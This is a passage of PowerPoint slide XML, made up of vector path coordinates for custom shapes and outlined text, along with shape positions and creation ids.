                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="117141" y="69232"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="114679" y="72755"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="113460" y="77361"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="113460" y="90052"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="115809" y="95787"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="125249" y="104774"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="131008" y="107032"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="141488" y="107032"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="144717" y="106671"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="150183" y="105271"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="152622" y="104413"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="154745" y="103374"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="156529" y="102561"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="158381" y="101477"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="163734" y="97661"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="164863" y="96916"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="177466" y="96916"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="177466" y="95223"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="137038" y="95223"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="133064" y="94139"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="127846" y="89781"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="126536" y="86529"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="126536" y="78377"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="127666" y="75374"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="160373" y="65687"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="160202" y="65687"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="164863" y="65416"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="177466" y="65416"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="177466" y="48955"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="176720" y="44890"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="174254" y="39425"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="174134" y="39155"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="174053" y="38974"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="724535" h="107314">
                  <a:moveTo>
                    <a:pt x="177466" y="96916"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="164863" y="96916"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="164863" y="104932"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="177466" y="104932"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="177466" y="96916"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="724535" h="107314">
                  <a:moveTo>
                    <a:pt x="177466" y="65416"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="164863" y="65416"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="164863" y="86393"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="161701" y="88810"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="158291" y="90887"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="150906" y="94364"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="146840" y="95223"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="177466" y="95223"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="177466" y="65416"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="724535" h="107314">
                  <a:moveTo>
                    <a:pt x="149980" y="27774"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="140133" y="27774"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="135013" y="28225"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="135266" y="28225"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="126175" y="29806"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="122607" y="30551"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="120122" y="31229"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="120122" y="44167"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="120623" y="44167"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="125159" y="42429"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="129405" y="41164"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="137581" y="39425"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="141284" y="38974"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="174053" y="38974"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="173762" y="38319"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="171594" y="35655"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="165880" y="31477"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="162469" y="29964"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="154610" y="28225"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="149980" y="27774"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="724535" h="107314">
                  <a:moveTo>
                    <a:pt x="218006" y="3838"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="203709" y="3838"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="203709" y="16980"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="218006" y="16980"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="218006" y="3838"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="724535" h="107314">
                  <a:moveTo>
                    <a:pt x="217193" y="29603"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="204522" y="29603"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="204522" y="104932"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="217193" y="104932"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="217193" y="29603"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="724535" h="107314">
                  <a:moveTo>
                    <a:pt x="256242" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="243572" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="243572" y="104932"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="256242" y="104932"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="256242" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="724535" h="107314">
                  <a:moveTo>
                    <a:pt x="382447" y="2687"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="369687" y="2687"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="362979" y="3838"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="331315" y="32629"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="327814" y="46561"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="327814" y="63542"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="345972" y="98429"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="369709" y="106761"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="380866" y="106761"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="406410" y="99739"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="408646" y="98723"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="411107" y="97639"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="411107" y="95223"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="371629" y="95223"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="367202" y="94432"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="341704" y="61893"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="341704" y="48074"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="342585" y="42135"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="371087" y="14090"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="411107" y="14090"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="411107" y="11538"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="404558" y="8241"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="398573" y="5961"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="387845" y="3341"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="382447" y="2687"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="724535" h="107314">
                  <a:moveTo>
                    <a:pt x="411107" y="82013"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="410181" y="82013"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="405280" y="86416"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="401532" y="88764"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="399787" y="89803"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="388771" y="94116"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="382741" y="95223"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="411107" y="95223"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="411107" y="82013"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="724535" h="107314">
                  <a:moveTo>
                    <a:pt x="411107" y="14090"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="382379" y="14090"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="388206" y="15151"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="399092" y="19374"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="404580" y="22738"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="410114" y="27367"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="411107" y="27367"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="411107" y="14090"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="724535" h="107314">
                  <a:moveTo>
                    <a:pt x="444714" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="432021" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="432021" y="104932"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="444714" y="104932"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="444714" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="724535" h="107314">
                  <a:moveTo>
                    <a:pt x="484576" y="3838"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="470280" y="3838"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="470280" y="16980"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="484576" y="16980"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="484576" y="3838"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="724535" h="107314">
                  <a:moveTo>
                    <a:pt x="483763" y="29603"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="471093" y="29603"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="471093" y="104932"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="483763" y="104932"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="483763" y="29603"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="724535" h="107314">
                  <a:moveTo>
                    <a:pt x="551473" y="27503"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="541310" y="27503"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="533476" y="28184"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="505308" y="58941"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="504677" y="67697"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="505334" y="76511"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="535709" y="106084"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="535959" y="106084"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="544472" y="106694"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="549373" y="106694"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="554048" y="106084"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="562946" y="103645"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="567305" y="102155"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="571596" y="100348"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="571596" y="95629"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="540474" y="95629"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="536928" y="95087"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="530492" y="92919"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="527714" y="91316"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="525388" y="89148"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="522948" y="86958"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="521133" y="84257"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="518251" y="77248"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="517551" y="73206"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="517551" y="68577"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="573064" y="68577"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="573064" y="61713"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="572879" y="58941"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="517544" y="58941"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="517996" y="53982"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="518093" y="52929"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="520374" y="47961"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="528436" y="39967"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="533834" y="37958"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="565929" y="37958"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="564798" y="36422"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="559288" y="30484"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="551473" y="27503"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="724535" h="107314">
                  <a:moveTo>
                    <a:pt x="571596" y="86529"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="570919" y="86529"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="568706" y="88493"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="565002" y="90503"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="554612" y="94613"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="549463" y="95629"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="571596" y="95629"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="571596" y="86529"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="724535" h="107314">
                  <a:moveTo>
                    <a:pt x="565929" y="37958"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="547363" y="37958"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="552399" y="39787"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="559017" y="47058"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="560688" y="52206"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="560734" y="58941"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="572879" y="58941"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="572548" y="53982"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="570998" y="47188"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="568415" y="41333"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="565929" y="37958"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="724535" h="107314">
                  <a:moveTo>
                    <a:pt x="607461" y="29603"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="594791" y="29603"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="594791" y="104932"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="607461" y="104932"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="607461" y="48684"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="610939" y="46042"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="614553" y="43851"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="622096" y="40442"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="625733" y="39584"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="655500" y="39584"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="654084" y="37958"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="607461" y="37958"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="607461" y="29603"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="724535" h="107314">
                  <a:moveTo>
                    <a:pt x="655500" y="39584"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="632553" y="39584"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="635309" y="40035"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="639532" y="41887"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="641158" y="43287"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="642265" y="45184"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="643349" y="46900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="644094" y="49271"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="644907" y="55322"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="645111" y="58574"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="645111" y="104932"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="657781" y="104932"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="657781" y="46900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="657543" y="46042"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="655861" y="40442"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="655739" y="40035"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="655658" y="39764"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="655500" y="39584"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="724535" h="107314">
                  <a:moveTo>
                    <a:pt x="640910" y="27503"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="628307" y="27503"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="623971" y="28429"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="615524" y="32109"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="611436" y="34684"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="607461" y="37958"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="654084" y="37958"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="647121" y="29964"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="640910" y="27503"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="724535" h="107314">
                  <a:moveTo>
                    <a:pt x="697779" y="40261"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="685109" y="40261"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="685109" y="89442"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="687119" y="96081"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="695114" y="104345"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="700963" y="106423"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="710855" y="106423"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="713362" y="106219"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="718986" y="105406"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="721583" y="104887"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="723616" y="104345"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="723955" y="104345"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="723955" y="95290"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="708394" y="95290"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="706447" y="94974"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="705988" y="94974"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="702390" y="93258"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="697869" y="81629"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="697779" y="40261"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="724535" h="107314">
                  <a:moveTo>
                    <a:pt x="723955" y="92852"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="723277" y="92852"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="722306" y="93258"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="720680" y="93777"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="716186" y="94974"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="714017" y="95290"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="723955" y="95290"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="723955" y="92852"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="724535" h="107314">
                  <a:moveTo>
                    <a:pt x="723955" y="29603"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="676549" y="29603"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="676549" y="40261"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="723955" y="40261"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="723955" y="29603"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="724535" h="107314">
                  <a:moveTo>
                    <a:pt x="697779" y="7948"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="685109" y="7948"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="685109" y="29603"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="697779" y="29603"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="697779" y="7948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34864882-9E0A-97CE-F6B2-721770ED377F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7152894" y="2410434"/>
              <a:ext cx="991869" cy="311150"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="991870" h="311150">
                  <a:moveTo>
                    <a:pt x="991527" y="195160"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="973023" y="140030"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="911580" y="88633"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="867346" y="65671"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="815492" y="45262"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="757034" y="27940"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="693039" y="14236"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="624509" y="4686"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="555498" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="490054" y="304"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="429298" y="5308"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="374370" y="14668"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="326377" y="28079"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="286461" y="45224"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="235331" y="89496"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="226364" y="115976"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="229730" y="143738"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="240080" y="162458"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="201828"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="130340" y="259461"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="318173" y="228663"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="350545" y="245452"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="402412" y="265861"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="460857" y="283184"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="524852" y="296900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="593369" y="306438"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="662393" y="311124"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="727849" y="310819"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="788593" y="305828"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="843534" y="296468"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="891514" y="283057"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="931430" y="265899"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="982560" y="221640"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="991527" y="19516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1" name="object 27">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{758ACCC4-E15E-7B1D-D011-A96DC7DCAF6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26307" y="1974046"/>
              <a:ext cx="252180" cy="88128"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic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6729DECB-5A20-89C2-799B-58293FC80EEE}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7718269" y="1895662"/>
              <a:ext cx="270510" cy="239395"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="270509" h="239394">
                  <a:moveTo>
                    <a:pt x="0" y="238963"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="269950" y="190662"/>
                  </a:lnTo>
                </a:path>
                <a:path w="270509" h="239394">
                  <a:moveTo>
                    <a:pt x="0" y="48301"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="269950" y="0"/>
                  </a:lnTo>
                </a:path>
                <a:path w="270509" h="239394">
                  <a:moveTo>
                    <a:pt x="5077" y="45758"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="5077" y="23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3" name="object 29">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B9896007-FE91-E2AA-8EC9-22DDD17EF04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52135" y="1608883"/>
              <a:ext cx="896296" cy="1065530"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic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E1E9D139-527E-D479-70DE-6AD9BEA13753}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7265534" y="2726175"/>
